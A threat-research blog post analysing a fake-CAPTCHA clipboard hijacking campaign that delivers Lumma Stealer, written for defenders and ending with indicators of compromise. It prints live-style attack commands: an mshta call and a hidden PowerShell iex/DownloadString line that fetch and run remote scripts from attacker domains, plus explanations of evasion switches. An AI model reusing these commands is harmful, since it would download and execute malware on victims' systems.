
How a clipboard hijacker delivers Lumma Stealer
The use of fake Captcha websites has doubled in only a few months.
Cybercriminal tactics ebb and flow over time, depending on environmental factors, the preferences of the groups involved, and what’s making money. Right now, criminals are showing renewed enthusiasm for clipboard hijacking and fake CAPTCHAs, a tactic that fools users into pasting malicious code into their computers.
Earlier this month, we described in detail how cybercriminals used clipboard hijacking to infect website visitors with a Trojan. The attack relied on a CAPTCHA lookalike with instructions that paste the clipboard contents into a command line.

The fake CAPTCHA instructions are found on all kinds of websites, but mostly fake web shops, news sites, and websites offering media like music and movies.
As researchers from ReliaQuest recently pointed out, the number of fake CAPTCHA pages nearly doubled from September 2024 to December 2024. And it’s not just criminals spreading Remote Access Trojans and information stealers any more—advanced threat actors like APT28 (aka Fancy Bear) are successfully employing these tactics as well.
So, we decided to dive a bit deeper into the tactics, techniques, and procedures (TTPs) behind these attacks.
Our Managed Detection & Response (MDR) team soon found an example where cybercriminals tried to infect one of our customers with Lumma Stealer malware.
The website tried to load the following command into the victim’s clipboard. Executing the instructions on the fake CAPTCHA would have pasted it into a command line and run it.
mshta https://eprime.shop/s6.mp3 ''I am not a robot - reCAPTCHA Verification ID: 2165
The command uses a trusted utility, MSHTA, to download an encoded PowerShell script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Enc JABkAFEAQwa2AEYAbgB4AHAAOQBDAHkaZAA4AEwATgBTAGMARwBqAFoAVABCAG...BHAF0AOgA6AEEAUwBDAEkASQAkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
- The -w 1 switch ensures the PowerShell window isn’t visible when the script runs.
- The Enc switch indicates that the following command is encoded in Base64 format.
Effectively, this script downloads a very obfuscated PowerShell script called Nusku.jpeg.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command
'iex((New-Object System.Net.WebClient).DownloadString('https://n.kliphirofey.shop/Nusku.jpeg'))'
- The ep bypass switch allows PowerShell to execute scripts without any restrictions, ignoring the current execution policy settings.
- The -nop switch prevents PowerShell from loading the user profile scripts when starting. This can speed up the startup time and also avoids any potential interference from user-specific configurations or scripts that might be set in the profile.
- The -Command switch indicates that what follows will be a command or script to execute directly in PowerShell.
The script hidden in Nusku.jpeg contains numerous complex mathematical operations and variable assignments, which obscure its purpose, and it includes several while loops and conditional statements that control the flow of execution based on the values of the variables. The main reason for the complexity is to avoid reverse engineering and sandbox analysis, which can give up if it takes too long to unwind.
Thankfully, one of our researchers spotted the significant part of the script. A function called fdsjnh.

This function decodes a Base64-encoded string that has been obfuscated through character manipulation and XOR encryption. The key steps involve creating an ArrayList from a string, decoding it from Base64, and then decrypting it using an XOR operation with another byte array derived from a hardcoded string.
Manually, you would have to de-obfuscate this script by looking for repeated calculations and see if they can be simplified, and then break down the complex expressions into simpler, more readable forms.
But with the help from the researcher, putting a breakpoint on the return expression of the fdsjnh function did the job. (The variable $kcuVdyrjJenvYgEdy contains the second script.)
This script turned out to be responsible for loading and executing a Portable Executable (PE) payload—Lumma Stealer—in memory, although it could be used to drop any type of malware in the memory of an affected system.
IOCs
https://findinmind[.]com/play.html
https://eprime[.]shop/s6.mp3
https://echoicedeals[.]shop/s6.mp3
https://etrademart[.]shop/s6.mp3
https://sharethewebs[.]shop/s5.swf
https://pomppie[.]shop/RUKE.mp4
https://n.kliphirofey[.]shop/Nusku.jpeg
4bd70b088c9c5aa80506a06c10f0d3ad27762bd04f6354cd8c9d9ee061cb41b7 (Nusku.jpeg)
53b7bfacc441837432f32613646fb10de2bb3c621d1c9835efaceb9e63a1d099 (payload)